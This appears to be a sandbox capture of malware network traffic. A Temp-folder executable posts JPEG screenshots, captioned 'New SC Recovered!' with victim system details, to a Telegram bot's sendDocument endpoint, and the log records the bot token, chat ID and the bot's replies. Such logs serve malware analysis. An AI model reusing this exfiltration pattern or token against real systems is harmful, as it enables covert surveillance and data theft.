2025-01-08 11:34:09 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 37 65 32 38 34 30 38 39 66 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd687e284089f6--
2025-01-08 11:34:09 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:09 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138012,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336049,"document":{"file_name":"user-116938 2025-03-21 13-42-00.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbHGd-YrF_vY8xM1cgdW7yC8rHadKtAAJdFgACPzjxU5cBUl7W696oAQAHbQADNgQ","file_unique_id":"AQADXRYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbHGd-YrF_vY8xM1cgdW7yC8rHadKtAAJdFgACPzjxU5cBUl7W696oAQAHbQADNgQ","file_unique_id":"AQADXRYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxxnfmKxf72PMTNXIHVu8gvKx2nSrQACXRYAAj848VOXAVJe1uveqDYE","file_unique_id":"AgADXRYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 03/21/2025 13:22:00\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49740	149.154.167.220	443	4564	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:11 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5fa305630ac0 Host: api.telegram.org Content-Length: 77665 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:12 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:12 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 66 61 33 30 35 36 33 30 61 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 66 61 33 30 35 36 33 30 61 63 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 30 2f 32 30 32 35 20 30 37 3a 30 33 3a 31 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd5fa305630ac0Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd5fa305630ac0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/10/2025 07:03:11User
2025-01-08 11:34:12 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:12 UTC	16355	OUT	Data Raw: 0c 4a 29 69 28 00 e6 92 96 92 81 87 d2 93 da 96 8a 00 43 49 4e a4 f6 a0 62 50 68 a2 80 0f 6a 4a 5a 28 18 98 a2 96 93 f1 a0 04 a3 f1 a5 a4 a0 61 f8 d2 52 d1 40 09 f8 51 45 14 00 52 0a 5a 3f 0a 63 12 8e 68 fc 28 a0 02 8a 38 a2 81 89 47 b5 14 50 02 51 cd 2d 25 20 0e 7b d1 c5 2f e3 49 4c 61 47 b5 18 a2 80 13 f1 a2 8f 5a 28 00 a4 14 b4 50 31 31 45 14 50 07 4d 45 2d 15 9b 69 2b b3 c5 8a 72 69 2e a4 f6 d6 e2 4c b3 67 1d 87 ad 34 c0 56 df cd 63 8e 70 05 59 b6 05 f0 ab da ae 3d b9 96 23 1c 8b b9 4f a1 e4 57 c7 7f 6e 55 8d 76 e5 f0 b6 be 4b fe 09 f6 b3 c8 28 c6 92 8d fd e4 bf 17 d7 e5 d1 15 74 4f 28 5e 19 24 65 05 07 cb 93 dc d7 4c 1c 32 fa d7 1b 79 a7 49 6a a1 cf 28 4e 01 3c 1f ca b4 74 09 33 ba 35 b8 6c a8 c9 89 c6 47 d5 4f 6a bc db 0f 1c 4c 3e bb 4e 77 5d ad fd Data Ascii: J)i(CINbPhjJZ(aR@QERZ?ch(8GPQ-% {/ILaGZ(P11EPME-i+ri.Lg4VcpY=#OWnUvK(tO(^$eL2yIj(N<t35lGOjL>Nw]
2025-01-08 11:34:12 UTC	16355	OUT	Data Raw: dd 69 86 9e d4 c3 5e 94 76 3a 10 86 92 96 90 d5 94 84 a4 a5 a6 9a 19 48 4a 4a 75 36 a1 94 84 34 51 49 48 61 49 45 25 21 a0 a4 34 bd 29 0d 48 c3 f3 a4 a5 a4 a0 62 73 47 14 1a 2a 46 74 d4 51 45 64 78 83 64 71 1c 6c ed d0 53 a7 31 c1 3b c0 6e 60 92 54 6d 8e a8 5b 2a 7f 15 03 f2 a8 2f d4 b5 94 aa 3a 95 a4 b9 bb 4f ed 4b 8b e1 75 67 2d b3 33 93 0c 30 34 72 4a 84 7d c6 3e 58 c9 3c 0c 92 71 d7 ad 72 d6 ab 28 49 25 b6 a7 76 1a 84 2a c1 b9 3d 49 bc c4 fe fa fe 74 d9 27 8e 34 2e 5d 70 3d ea a4 17 b3 7d a6 f4 47 a8 88 25 95 d1 a1 ba d8 eb fb b1 9c c7 f2 82 57 aa f4 18 f9 71 d3 14 eb ab d9 65 d0 e4 b3 86 6b 60 db 24 59 96 6f 3f 74 8c 58 90 cb b7 e4 27 18 c1 61 90 45 67 f5 a9 5a fc a6 cb 01 0e 6b 39 a2 eb 7c 97 13 40 48 2f 0b 94 6d a7 23 34 55 78 9d 66 d4 35 0b 88 ce Data Ascii: i^v:HJJu64QIHaIE%!4)HbsGFtQEdxdqlS1;n`Tm[/:OKug-304rJ}>X<qr(I%v*=It'4.]p=}G%Wqek`$Yo?tX'aEgZk9\|@H/m#4Uxf5
2025-01-08 11:34:12 UTC	15447	OUT	Data Raw: 3f 0a 39 ee 28 a0 61 45 14 50 02 d5 8b 41 fb c7 ff 00 ae 6d 55 ea c5 a0 f9 a4 ff 00 ae 6d 53 3f 84 89 ec 73 6d d6 9b 4e 6f bd 4d fa 56 e7 4a 12 83 45 25 21 85 25 2d 14 14 25 14 52 50 01 f9 52 52 d2 1f ad 21 85 14 73 49 40 c2 8e b4 52 50 02 f1 49 f8 51 45 03 12 8a 38 a2 80 3a 69 23 73 22 4b 0c 86 39 53 a3 0f 4e e0 8e e0 fa 1a 85 a2 bb 69 d2 61 34 48 e8 a5 02 a4 28 a8 54 f5 05 40 da 73 ee 2a dd 15 cf 2a 50 93 bb 47 8f 0c 45 4a 6a d1 66 6c ba 7c d3 c9 24 92 ce b9 96 11 03 2a a2 aa f9 60 82 14 00 30 06 40 e9 8a 96 3b 6b a8 5c 34 77 0a 40 89 62 da f1 ab 2b 2a fd d0 c0 8c 36 3b 67 38 ab b4 54 fd 5e 9f 63 4f ae 57 fe 63 3e e2 de ee ee 5d d3 79 2a cd 17 91 23 a2 e3 7c 79 04 2e df ba a0 10 3e e8 14 af 67 74 23 b7 8a 2b c2 b0 db ef 11 a1 50 76 87 18 6c 71 dc 13 57 Data Ascii: ?9(aEPAmUmS?smNoMVJE%!%-%RPRR!sI@RPIQE8:i#s"K9SNia4H(T@s*PGEJjfl\|$`0@;k\4w@b+6;g8T^cOWc>]y#\|y.>gt#+PvlqW
2025-01-08 11:34:12 UTC	12079	OUT	Data Raw: 0a 9d 0d 57 d5 ff 00 e4 15 37 fc 07 ff 00 42 15 e7 61 3f de 21 ea bf 33 bf 17 fe ef 53 d1 fe 47 31 45 14 57 dd 1f 08 14 51 45 30 0a 82 6b 98 63 2c 8c f8 6c 74 c1 a9 ea 1d 36 c6 db 52 f1 10 b3 ba 79 11 24 07 05 08 07 21 73 dc 1f 4a 89 b4 a2 db 3a 70 b4 fd a5 44 8e cf fe 12 bd 0f fe 7f bf f2 13 ff 00 85 28 f1 56 86 48 02 f8 73 eb 1b 8f e9 5c a6 9b e1 b4 ba d1 ef ae 66 79 16 e2 16 75 89 01 00 31 51 93 91 8a a1 a8 69 b0 59 e8 9a 7d d6 f9 0d cd d6 e6 2a 48 da 14 1e 30 31 ee 3b d7 9c b0 f4 5b e5 4d 9f 42 eb 54 4a f6 47 a5 df a3 c9 6d 88 d0 bb 2c 88 fb 41 00 90 ae 09 eb ec 2b 1f 59 b0 93 50 02 58 b4 f9 e3 b9 1c 6e 2d 1e 18 7a 1f 9a b4 ae 75 14 82 76 88 cb 66 a5 71 c4 97 3b 1b a7 71 8e 29 d6 97 cb 73 29 45 96 d5 88 5c e2 19 f7 9f cb 03 8a e2 51 9c 7d e4 74 49 c2 Data Ascii: W7Ba?!3SG1EWQE0kc,lt6Ry$!sJ:pD(VHs\fyu1QiY}*H01;[MBTJGm,A+YPXn-zuvfq;q)s)E\Q}tI
2025-01-08 11:34:12 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 66 61 33 30 35 36 33 30 61 63 30 2d 2d 0d 0a Data Ascii: -----------------------------8dd5fa305630ac0--
2025-01-08 11:34:12 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:12 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138013,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336052,"document":{"file_name":"user-116938 2025-03-10 07-13-13.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbHWd-YrTJNxs1AtJJtbCPOsBJhsWTAAJeFgACPzjxU8XDQH7rWaKiAQAHbQADNgQ","file_unique_id":"AQADXhYAAj848VNy","file_size":14247,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbHWd-YrTJNxs1AtJJtbCPOsBJhsWTAAJeFgACPzjxU8XDQH7rWaKiAQAHbQADNgQ","file_unique_id":"AQADXhYAAj848VNy","file_size":14247,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGx1nfmK0yTcbNQLSSbWwjzrASYbFkwACXhYAAj848VPFw0B-61miojYE","file_unique_id":"AgADXhYAAj848VM","file_size":77036},"caption":"New SC Recovered!\n\nTime: 03/10/2025 07:03:11\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49741	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:19 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd5e9b104624c6 Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:19 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:19 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 39 62 31 30 34 36 32 34 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 39 62 31 30 34 36 32 34 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 38 2f 32 30 32 35 20 32 33 3a 33 33 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd5e9b104624c6Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd5e9b104624c6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/08/2025 23:33:43User
2025-01-08 11:34:19 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:19 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:19 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:19 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:19 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:19 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 65 39 62 31 30 34 36 32 34 63 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd5e9b104624c6--
2025-01-08 11:34:19 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:19 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138014,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336059,"document":{"file_name":"user-116938 2025-03-08 23-43-44.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbHmd-Yrst1H6N86CtcttwE0TXu9IDAAJfFgACPzjxU57fBGHudJzsAQAHbQADNgQ","file_unique_id":"AQADXxYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbHmd-Yrst1H6N86CtcttwE0TXu9IDAAJfFgACPzjxU57fBGHudJzsAQAHbQADNgQ","file_unique_id":"AQADXxYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGx5nfmK7LdR-jfOgrXLbcBNE17vSAwACXxYAAj848VOe3wRh7nSc7DYE","file_unique_id":"AgADXxYAAj848VM","file_size":76828},"caption":"New SC Recovered!\n\nTime: 03/08/2025 23:33:43\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49742	149.154.167.220	443	4516	C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:32 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63df8345268e Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:32 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:32 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 64 66 38 33 34 35 32 36 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 64 66 38 33 34 35 32 36 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 35 20 31 36 3a 31 36 3a 31 38 0a 55 73 65 72 Data Ascii: -----------------------------8dd63df8345268eContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd63df8345268eContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/15/2025 16:16:18User
2025-01-08 11:34:32 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
